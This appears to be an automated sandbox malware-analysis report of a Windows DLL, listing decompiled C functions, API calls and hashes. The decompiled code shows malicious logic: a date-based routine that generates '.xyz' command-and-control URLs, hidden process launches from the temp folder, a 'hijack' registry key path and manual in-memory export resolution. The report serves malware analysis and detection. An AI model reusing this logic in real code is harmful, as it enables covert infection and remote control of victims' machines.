                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                      • String ID: Mid2Failed
                                                                                                                                                      • API String ID: 2934472556-1001836097
                                                                                                                                                      • Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                      • Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
                                                                                                                                                      • Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                      • Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100225D0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                      			E100225D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				struct _SYSTEMTIME _v36;
				char _v303;
				char _v304;
				char _v332;
				char _v360;
				char _v388;
				signed int _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				void* __ebp;
				intOrPtr _t91;

				_t97 = __eflags;
				_t89 = __edi;
				_push(0xffffffff);
				_push(E10022A77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t91;
				_v392 = 0;
				E10001160( &_v332, __eflags, "http://");
				_v8 = 0;
				_v304 = 0;
				E1000CF20(__edi,  &_v303, 0, 0x103);
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetLocalTime( &_v36);
				_push(_v36.wDay & 0x0000ffff);
				_push(_v36.wMonth & 0x0000ffff);
				E1000CC93(_t89,  &_v304, "changenewsys%04d%02d%02d", _v36.wYear & 0x0000ffff);
				_v20 = E1001A480(__ebx, _v36.wYear & 0x0000ffff, _t89, __esi, _t97,  &_v304);
				_v396 = E10001160( &_v360, _t97, _v20);
				_v400 = _v396;
				_v8 = 1;
				E10001A70( &_v332, _v400);
				_v8 = 0;
				E100011A0( &_v360);
				_push(_v20);
				E1000CA30(__ebx, _t89, __esi, _t97);
				_v404 = E10001160( &_v388, _t97, ".xyz/");
				_v408 = _v404;
				_v8 = 2;
				E10001A70( &_v332, _v408);
				_v8 = 0;
				E100011A0( &_v388);
				E10001110(_a4, _t97,  &_v332);
				_v392 = _v392 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v332);
				 *[fs:0x0] = _v16;
				return _a4;
			}



















                                                                                                                                                      0x100225d0
                                                                                                                                                      0x100225d0
                                                                                                                                                      0x100225d3
                                                                                                                                                      0x100225d5
                                                                                                                                                      0x100225e0
                                                                                                                                                      0x100225e1
                                                                                                                                                      0x100225ee
                                                                                                                                                      0x10022603
                                                                                                                                                      0x10022608
                                                                                                                                                      0x1002260f
                                                                                                                                                      0x10022624
                                                                                                                                                      0x1002262c
                                                                                                                                                      0x10022634
                                                                                                                                                      0x10022637
                                                                                                                                                      0x1002263a
                                                                                                                                                      0x1002263d
                                                                                                                                                      0x10022645
                                                                                                                                                      0x1002264f
                                                                                                                                                      0x10022654
                                                                                                                                                      0x10022666
                                                                                                                                                      0x1002267d
                                                                                                                                                      0x1002268f
                                                                                                                                                      0x1002269b
                                                                                                                                                      0x100226a1
                                                                                                                                                      0x100226b2
                                                                                                                                                      0x100226b7
                                                                                                                                                      0x100226c1
                                                                                                                                                      0x100226c9
                                                                                                                                                      0x100226ca
                                                                                                                                                      0x100226e2
                                                                                                                                                      0x100226ee
                                                                                                                                                      0x100226f4
                                                                                                                                                      0x10022705
                                                                                                                                                      0x1002270a
                                                                                                                                                      0x10022714
                                                                                                                                                      0x10022723
                                                                                                                                                      0x10022731
                                                                                                                                                      0x10022737
                                                                                                                                                      0x10022744
                                                                                                                                                      0x1002274f
                                                                                                                                                      0x10022759

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 10022624
                                                                                                                                                      • GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                      • _sprintf.LIBCMT ref: 10022666
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastLocalTime___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: .xyz/$changenewsys%04d%02d%02d$http://
                                                                                                                                                      • API String ID: 984892819-377150047
                                                                                                                                                      • Opcode ID: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                      • Instruction ID: 81f1802f078645e924587200c16c269d37407c15be22a51fe8bac89201a43415
                                                                                                                                                      • Opcode Fuzzy Hash: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                      • Instruction Fuzzy Hash: 08412975C04228ABDB14CBA4DC51BEEB7B4EF08744F4081E9F509A7291EB346B84CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FEA0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022AF1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A1D0(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                      0x1001fea0
                                                                                                                                                      0x1001fea0
                                                                                                                                                      0x1001fea3
                                                                                                                                                      0x1001fea5
                                                                                                                                                      0x1001feb0
                                                                                                                                                      0x1001feb1
                                                                                                                                                      0x1001febe
                                                                                                                                                      0x1001fec5
                                                                                                                                                      0x1001feda
                                                                                                                                                      0x1001fee2
                                                                                                                                                      0x1001fef7
                                                                                                                                                      0x1001ff03
                                                                                                                                                      0x1001ff17
                                                                                                                                                      0x1001ff25
                                                                                                                                                      0x1001ff26
                                                                                                                                                      0x1001ff33
                                                                                                                                                      0x1001ff47
                                                                                                                                                      0x1001ff56
                                                                                                                                                      0x1001ff61
                                                                                                                                                      0x1001ff66
                                                                                                                                                      0x1001ff70
                                                                                                                                                      0x1001ff78
                                                                                                                                                      0x1001ff82

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FEDA
                                                                                                                                                      • _memset.LIBCMT ref: 1001FEF7
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FF47
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                      • String ID: %s%s %s %s$0011
                                                                                                                                                      • API String ID: 3552933064-2132516514
                                                                                                                                                      • Opcode ID: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
                                                                                                                                                      • Instruction ID: 6384a0b866657e4047376afeeb64c65eb3b3c0e3c567da3335d1d9c995957fc0
                                                                                                                                                      • Opcode Fuzzy Hash: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
                                                                                                                                                      • Instruction Fuzzy Hash: 7911B6B6C00248ABE714EB90DC96FDD7778EB04750F4041A4FA19661C1EB747B48CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A1D0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A1D0(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				void* _t27;

				_v24 = 0;
				E1000CF20(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF20(_t27,  &_v20, 0, 0x10);
				if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20) != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}







                                                                                                                                                      0x1001a1d6
                                                                                                                                                      0x1001a1e5
                                                                                                                                                      0x1001a1ed
                                                                                                                                                      0x1001a1f4
                                                                                                                                                      0x1001a1fb
                                                                                                                                                      0x1001a209
                                                                                                                                                      0x1001a233
                                                                                                                                                      0x1001a239
                                                                                                                                                      0x1001a243
                                                                                                                                                      0x1001a249
                                                                                                                                                      0x1001a249
                                                                                                                                                      0x1001a256

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                      • _memset.LIBCMT ref: 1001A209
                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                      • String ID: D
                                                                                                                                                      • API String ID: 1151464618-2746444292
                                                                                                                                                      • Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                      • Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
                                                                                                                                                      • Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                      • Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001AEB0, Relevance: 8.9, APIs: 7, Instructions: 168COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001AEB0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _t105;
				void* _t174;
				void* _t176;

				_t172 = __edi;
				_t122 = __ebx;
				_v16 = _a4;
				_t4 = _v16 + 4; // 0x7d83ec45
				_v24 =  *_t4;
				_v12 = 0;
				_v20 =  *_v16 + 0x78;
				if( *((intOrPtr*)(_v20 + 4)) != 0) {
					_v8 = _v24 +  *_v20;
					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							if( *(_v8 + 0x18) != 0) {
								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
									L19:
									_t70 = _v16 + 0x30; // 0x51e84d8b
									_v28 = E1000DF58(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AA60);
									if(_v28 != 0) {
										_v12 =  *(_v28 + 4) & 0x0000ffff;
										L22:
										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
										}
										SetLastError(0x7f);
										return 0;
									}
									SetLastError(0x7f);
									return 0;
								}
								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
								_t105 = L1000CE56(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
								_t176 = _t174 + 4;
								_v44 = _t105;
								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
								if(_v44 != 0) {
									_v32 = 0;
									while(_v32 <  *(_v8 + 0x18)) {
										 *_v44 = _v24 +  *_v36;
										 *((short*)(_v44 + 4)) =  *_v40;
										_v32 = _v32 + 1;
										_v36 = _v36 + 4;
										_v40 = _v40 + 2;
										_v44 = _v44 + 8;
									}
									_t66 = _v16 + 0x30; // 0x51e84d8b
									E1000D9D0( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AA90);
									_t174 = _t176 + 0x10;
									goto L19;
								}
								SetLastError(0xe);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L22;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}
















                                                                                                                                                      0x1001aeb0
                                                                                                                                                      0x1001aeb0
                                                                                                                                                      0x1001aeb9
                                                                                                                                                      0x1001aebf
                                                                                                                                                      0x1001aec2
                                                                                                                                                      0x1001aec5
                                                                                                                                                      0x1001aed4
                                                                                                                                                      0x1001aede
                                                                                                                                                      0x1001aef7
                                                                                                                                                      0x1001af01
                                                                                                                                                      0x1001af0e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af1b
                                                                                                                                                      0x1001af26
                                                                                                                                                      0x1001af6a
                                                                                                                                                      0x1001af87
                                                                                                                                                      0x1001b049
                                                                                                                                                      0x1001b05a
                                                                                                                                                      0x1001b06a
                                                                                                                                                      0x1001b071
                                                                                                                                                      0x1001b086
                                                                                                                                                      0x1001b089
                                                                                                                                                      0x1001b092
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b0b2
                                                                                                                                                      0x1001b096
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b09c
                                                                                                                                                      0x1001b075
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b07b
                                                                                                                                                      0x1001af96
                                                                                                                                                      0x1001afa2
                                                                                                                                                      0x1001afaf
                                                                                                                                                      0x1001afb4
                                                                                                                                                      0x1001afb7
                                                                                                                                                      0x1001afc0
                                                                                                                                                      0x1001afc7
                                                                                                                                                      0x1001afd8
                                                                                                                                                      0x1001b005
                                                                                                                                                      0x1001b01b
                                                                                                                                                      0x1001b026
                                                                                                                                                      0x1001afe7
                                                                                                                                                      0x1001aff0
                                                                                                                                                      0x1001aff9
                                                                                                                                                      0x1001b002
                                                                                                                                                      0x1001b002
                                                                                                                                                      0x1001b03d
                                                                                                                                                      0x1001b041
                                                                                                                                                      0x1001b046
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b046
                                                                                                                                                      0x1001afcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001afd1
                                                                                                                                                      0x1001af6e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af74
                                                                                                                                                      0x1001af39
                                                                                                                                                      0x1001af5b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af5b
                                                                                                                                                      0x1001af3d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001af43
                                                                                                                                                      0x1001af01
                                                                                                                                                      0x1001aee2
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AEE2
                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AF0E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                      • Opcode ID: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                      • Instruction ID: 0b553024b132d835b53bcc3061d3cd906e00f9f3519ff007c74d2c873b7cba87
                                                                                                                                                      • Opcode Fuzzy Hash: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                      • Instruction Fuzzy Hash: A071D274A00249EFDB04CF94C994AAEB7F1FF48304F618199E915AB341D735EE81CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FDC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022ADF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A1D0(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                      0x1001fdc0
                                                                                                                                                      0x1001fdc0
                                                                                                                                                      0x1001fdc3
                                                                                                                                                      0x1001fdc5
                                                                                                                                                      0x1001fdd0
                                                                                                                                                      0x1001fdd1
                                                                                                                                                      0x1001fdde
                                                                                                                                                      0x1001fde5
                                                                                                                                                      0x1001fdfa
                                                                                                                                                      0x1001fe02
                                                                                                                                                      0x1001fe17
                                                                                                                                                      0x1001fe23
                                                                                                                                                      0x1001fe37
                                                                                                                                                      0x1001fe45
                                                                                                                                                      0x1001fe4e
                                                                                                                                                      0x1001fe62
                                                                                                                                                      0x1001fe71
                                                                                                                                                      0x1001fe7c
                                                                                                                                                      0x1001fe81
                                                                                                                                                      0x1001fe8b
                                                                                                                                                      0x1001fe93
                                                                                                                                                      0x1001fe9d

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                      • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                      • String ID: %s%s 200 %s
                                                                                                                                                      • API String ID: 3552933064-2772210913
                                                                                                                                                      • Opcode ID: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                      • Instruction ID: fa445e4306be4de550b1f58f9f77f959fb08a7f600bfac00d2f80f5c48e4b5e6
                                                                                                                                                      • Opcode Fuzzy Hash: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                      • Instruction Fuzzy Hash: B01198B6C00208ABE714EB90DC56FDE777CEB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F990, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF20(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A2F0( &_v276,  &_v12);
				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA30(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}










                                                                                                                                                      0x1001f990
                                                                                                                                                      0x1001f990
                                                                                                                                                      0x1001f999
                                                                                                                                                      0x1001f9ae
                                                                                                                                                      0x1001f9b6
                                                                                                                                                      0x1001f9c8
                                                                                                                                                      0x1001f9e1
                                                                                                                                                      0x1001f9f8
                                                                                                                                                      0x1001fa08
                                                                                                                                                      0x1001fa10
                                                                                                                                                      0x1001fa14
                                                                                                                                                      0x1001fa19
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001fa1f
                                                                                                                                                      0x1001fa25

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                        • Part of subcall function 1001A2F0: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FA08
